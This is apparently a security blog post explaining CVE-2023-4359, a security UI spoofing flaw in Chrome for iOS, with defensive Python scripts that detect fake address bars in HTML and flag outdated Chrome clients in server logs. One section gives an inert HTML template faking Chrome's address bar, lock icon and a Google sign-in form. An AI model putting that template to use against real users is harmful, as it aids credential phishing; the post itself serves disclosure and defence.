On August 15, 2023, Google's Chrome 116 stable release disclosed CVE-2023-4359, a bug in Chrome for iOS. The release note classifies it as an "inappropriate implementation" in the App Launcher that let a remote attacker use a crafted HTML page to spoof elements of the browser's security user interface (UI): the parts of the screen, such as the address bar and the lock icon, that the browser draws itself and that page content is never supposed to control. A page that can imitate those elements can make a phishing site look legitimate and harvest credentials or other sensitive data.

This post breaks down what the vulnerability was, how an attack could work, what a spoof page looks like, and where to learn more. The patch shipped in Chrome for iOS version 116.0.5845.96, so if your iOS browser is older than that, update as soon as possible.

What Exactly Was the Vulnerability?

According to the Chrome release note, the bug was an inappropriate implementation in Chrome's App Launcher: a remote attacker could use a crafted HTML page to spoof elements of the security UI. In practice that means page content standing in for browser-drawn indicators such as the lock icon or the address bar, so users feel secure on a page that is entirely under the attacker's control.

These UI elements are vital. They are how users tell a genuine site from an imitation and confirm that a password is going to the origin they expect, over HTTPS. Spoofing them undermines the trust model of web browsing, because everything below the browser's own toolbar is untrusted content by design.

Chromium Security Severity: Medium
Affected Versions: Chrome on iOS prior to 116.0.5845.96
Type: Security UI spoofing via crafted HTML
Exploitability: Remote (the attacker only needs the victim to load a web page)

How the Exploit Worked

Say an attacker sets up a phishing site, for instance a fake Google login page. In a correctly implemented browser, the security UI (the padlock, the URL bar) is drawn by the browser above the content area and cannot be faked by the page itself.

On affected Chrome for iOS builds, a crafted HTML page could, under conditions Google has not described publicly, present security indicators convincingly enough to fool most users. The release note attributes the flaw to Chrome's App Launcher component, which either displayed browser-level UI incorrectly or let the page occupy space reserved for it.

The general pattern for this class of bug is that the browser gives page content more control over what the user sees than it should, for example by letting content cover or replace browser-drawn UI. The public advisory does not say which code path in App Launcher was affected, so the example below illustrates the technique rather than the reporter's exact trigger.

Code Snippet: Spoofing the UI

Here is a simplified HTML page that shows what a spoofed address bar looks like. It is a generic illustration of the technique, not the reporter's proof of concept:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Login - Google</title>
    <style>
      /* Fakes the Chrome address bar: pinned to the top of the viewport,
         above everything else, in Chrome's grey toolbar colours */
      #fakebar {
        background: #f1f3f4;
        color: #202124;
        width: 100vw;
        height: 54px;
        position: fixed;
        top: 0; left: 0;
        z-index: 9999;
        display: flex;
        align-items: center;
        font-family: sans-serif;
      }
      /* Green lock glyph, sized to resemble the real indicator */
      #lock {
        margin: 0 15px;
        font-size: 28px;
        color: #3cba54;
      }
      #url {
        font-size: 19px;
      }
      /* Push the page content down so it starts below the fake bar */
      body { margin-top: 54px; }
    </style>
  </head>
  <body>
    <div id="fakebar">
      <span id="lock">&#128274;</span> <!-- U+1F512, the lock emoji -->
      <span id="url">https://accounts.google.com</span>
    </div>
    <h2>Welcome to Google</h2>
    <!-- A real kit would post this form to the attacker's server;
         the sample has no action attribute, so it is inert -->
    <form>
      <label>Username: <input type="text" name="username"></label><br>
      <label>Password: <input type="password" name="password"></label><br>
      <input type="submit" value="Sign In">
    </form>
  </body>
</html>

Rendered in a correctly behaving browser, this page shows two address bars, the real one drawn by Chrome and the fake one drawn by the page, and the duplicate gives it away. A UI-spoofing bug like CVE-2023-4359 matters because it removes that tell: when page content can occupy the space the browser reserves for its own UI, the user sees only the fake bar, complete with a lock and an https:// address, regardless of what the page actually is.
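The spoof above has a recognisable shape: an element pinned to the top of the viewport whose text carries an https:// address or a lock glyph, something real browser UI never puts in the page's DOM. The scanner below, an added example that is not from the original post or from Chromium, parses an HTML document with the standard library, extracts the elements pinned with position: fixed and top: 0 (from a <style> rule or an inline style), and reports those that contain a URL or a lock. The function names and both sample documents are this example's own; the samples are constructed, one condensed from the spoof page above and one benign page with a fixed cookie banner that must not be reported.

```python
"""Heuristic scan for fake browser chrome inside HTML.

Added example, not from the original post or from Chromium. It looks for the
pattern the spoof page above relies on: an element pinned to the top of the
viewport whose text contains an https:// address or a lock glyph. All
function names and both sample documents are this example's own.
"""
import re
from html.parser import HTMLParser

LOCK_GLYPHS = ("\U0001F512", "\U0001F510", "\U0001F513")   # lock emoji variants
URL_RE = re.compile(r"https?://[\w.-]+")
FIXED_RE = re.compile(r"position\s*:\s*fixed")
TOP_RE = re.compile(r"(?<![\w-])top\s*:\s*0(?:px)?\s*(?:;|$)")   # not margin-top etc.


class _Collector(HTMLParser):
    """Collect <style> text and, for every element, its attributes and text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)   # &#128274; -> the lock glyph
        self.css = []
        self.stack = []        # open elements: (tag, attrs, text chunks)
        self.elements = []     # closed elements: (tag, attrs, text)

    def handle_starttag(self, tag, attrs):
        self.stack.append((tag, dict(attrs), []))

    def handle_data(self, data):
        if self.stack and self.stack[-1][0] == "style":
            self.css.append(data)
        for _, _, chunks in self.stack:        # text belongs to every open ancestor
            chunks.append(data)

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                self._close_from(i)
                return

    def _close_from(self, i):
        for t, a, chunks in self.stack[i:]:    # also closes void children such as <input>
            self.elements.append((t, a, "".join(chunks)))
        del self.stack[i:]

    def close(self):
        super().close()
        self._close_from(0)                    # flush anything still open


def fixed_top_selectors(css):
    """Selectors whose rule pins the element to the top of the viewport.

    Simple rule parser: comments are stripped, nested @media blocks are not handled.
    """
    css = re.sub(r"/\*.*?\*/", "", css, flags=re.S)
    found = set()
    for selector, body in re.findall(r"([^{}]+)\{([^{}]*)\}", css):
        body = body.lower()
        if FIXED_RE.search(body) and TOP_RE.search(body):
            found.update(s.strip() for s in selector.split(","))
    return found


def find_fake_chrome(html):
    """Return the elements that look like a spoofed address bar."""
    parser = _Collector()
    parser.feed(html)
    parser.close()
    pinned = fixed_top_selectors("".join(parser.css))
    hits = []
    for tag, attrs, text in parser.elements:
        inline = (attrs.get("style") or "").lower()
        by_inline = FIXED_RE.search(inline) and TOP_RE.search(inline)
        by_rule = ("#" + (attrs.get("id") or "")) in pinned or any(
            "." + c in pinned for c in (attrs.get("class") or "").split())
        if not (by_inline or by_rule):
            continue
        url = URL_RE.search(text)
        lock = any(g in text for g in LOCK_GLYPHS)
        if url or lock:                        # pinned element dressed up as security UI
            hits.append({"tag": tag, "id": attrs.get("id"),
                         "url": url.group(0) if url else None, "lock": lock})
    return hits


# Constructed sample: a condensed version of the spoof page in this post.
SAMPLE_SPOOF = """<!DOCTYPE html><html><head><meta charset="utf-8"><style>
/* fake address bar pinned to the top of the viewport */
#fakebar { background: #f1f3f4; position: fixed; top: 0; left: 0; width: 100vw; height: 54px; }
#lock { margin: 0 15px; color: #3cba54; }
</style></head><body>
<div id="fakebar"><span id="lock">&#128274;</span><span id="url">https://accounts.google.com</span></div>
<h2>Welcome to Google</h2>
<form><input type="password" name="password"><input type="submit" value="Sign In"></form>
</body></html>"""

# Constructed sample: a fixed banner with no security-looking content, plus a
# URL in ordinary page flow. Neither should be reported.
SAMPLE_BENIGN = """<html><head><style>.banner { position: fixed; top: 0; }</style></head>
<body><div class="banner">This site uses cookies.</div>
<p>Documentation: https://example.org/docs</p></body></html>"""

if __name__ == "__main__":
    print(find_fake_chrome(SAMPLE_SPOOF))    # one hit: div#fakebar
    print(find_fake_chrome(SAMPLE_BENIGN))   # []
```

The check is deliberately narrow: a pinned element alone is common (cookie banners, sticky headers) and a URL in body text is common, but a pinned element that carries a URL or lock glyph is what a fake toolbar needs. Run it over crawled or mailed HTML as one phishing-kit signal, not as a verdict on its own.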

Possible Attack Scenarios

1. Phishing: Users are lured to open a link via email or SMS. The attacker's page mimics the Google login and shows a fake https:// address and lock icon, so users enter their credentials.
2. Fake security prompts: The same trick can imitate other browser UI, such as permission dialogs, to talk users into granting access or revealing information.
3. Injected content: The attacker does not need to own the site. If malicious HTML or JavaScript can be injected into an otherwise benign page (through an XSS flaw or a compromised third-party script), it can spoof the browser's UI just as well, because what is being faked is the browser's own presentation, not the site's.

Why It Mattered

- User trust: Most users rely on visible browser UI, the lock and the https:// address in particular, to decide whether a page is safe. This bug let attackers borrow that trust.
- Mobile focus: On a desktop the address bar is large and always visible, so fakes are easier to spot. On a phone's small screen, where the toolbar is minimal and collapses as you scroll, UI spoofing is far more convincing.

Fix and Mitigation

Google fixed the bug in Chrome for iOS version 116.0.5845.96. The release note does not describe the change, but the intended behaviour is that the address bar and security indicators are drawn by the browser, above the content area, so that nothing a page renders can stand in for them.

- Update Chrome on iOS to the latest version; anything older than 116.0.5845.96 is affected.

- Never trust lock icons or addresses that appear inside a web page's content. The real ones live in the browser's toolbar, and tapping the address bar to reveal the full URL is the reliable check.
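For anyone responsible for a fleet rather than a single phone, the update advice turns into a question of who is still on an old build. Chrome on iOS identifies itself with a CriOS/<version> token in its User-Agent header, so web-server or proxy logs can answer that. The script below is an added example, not from the original post or from Google: it pulls the User-Agent out of combined-format log lines, compares the CriOS version against 116.0.5845.96 as a tuple, and lists the clients that have not reached the fixed build. The log lines are constructed for the example and the function names are its own.

```python
"""Flag Chrome-on-iOS clients that have not reached the fixed build.

Added example, not from the original post or from Google. The fixed version
comes from the Chrome 116 release note; the sample log lines are constructed.
"""
import re

FIXED_VERSION = (116, 0, 5845, 96)            # first Chrome for iOS build with the fix
CRIOS_RE = re.compile(r"CriOS/(\d+(?:\.\d+)*)")
UA_RE = re.compile(r'"([^"]*)"\s*$')           # last quoted field of a combined log line


def parse_version(text):
    """'116.0.5845.96' -> (116, 0, 5845, 96); tuples compare lexicographically."""
    return tuple(int(part) for part in text.split("."))


def is_vulnerable(user_agent):
    """True for Chrome on iOS older than the fixed build; False for anything else.

    A truncated version such as 'CriOS/116.0' compares below the full fixed
    version and is therefore reported as vulnerable, which is the safe default.
    Desktop Chrome ('Chrome/...') never matches and is not in scope for this CVE.
    """
    m = CRIOS_RE.search(user_agent)
    if not m:
        return False
    return parse_version(m.group(1)) < FIXED_VERSION


def vulnerable_clients(log_lines):
    """Return (client_ip, CriOS version) for every line from a vulnerable client."""
    hits = []
    for line in log_lines:
        ua = UA_RE.search(line)
        if not ua or not is_vulnerable(ua.group(1)):
            continue
        hits.append((line.split()[0], CRIOS_RE.search(ua.group(1)).group(1)))
    return hits


# Constructed sample in Apache/nginx combined log format.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Aug/2023:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 '
    '(KHTML, like Gecko) CriOS/115.0.5790.130 Mobile/15E148 Safari/604.1"',
    '203.0.113.6 - - [20/Aug/2023:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 '
    '(KHTML, like Gecko) CriOS/116.0.5845.96 Mobile/15E148 Safari/604.1"',
    '203.0.113.7 - - [20/Aug/2023:10:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/115.0.5790.170 Safari/537.36"',
]

if __name__ == "__main__":
    for ip, version in vulnerable_clients(SAMPLE_LOG):
        print(f"{ip} still on Chrome for iOS {version}")
```

The same comparison works on an MDM export that lists installed app versions; only the extraction step changes. Treat the result as a prompt to push updates, not as proof of compromise: an old client is exposed, not necessarily attacked.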

References and Further Reading

- Google Chrome Releases: Stable Channel Update for iOS
- Chromium Issue 1469646: UI Spoofing via HTML on App Launcher in Chrome for iOS
- CVE Detail: CVE-2023-4359
- Google Security Blog (for updates on Google security issues)
- OWASP: UI Redressing / Clickjacking

Conclusion

CVE-2023-4359 shows how a small mistake in browser UI handling can have large consequences, especially on mobile. A crafted HTML page could visually spoof Chrome's own security elements, making phishing far more convincing. It is fixed in 116.0.5845.96, so keep the browser up to date and stay alert to security UI that appears inside page content.

If you found this post helpful, share it so others can stay secure on their devices!


Remember: always check the browser's own security indicators; never trust web content alone.

Timeline

Published on: 08/15/2023 18:15:00 UTC
Last modified on: 08/27/2023 03:15:00 UTC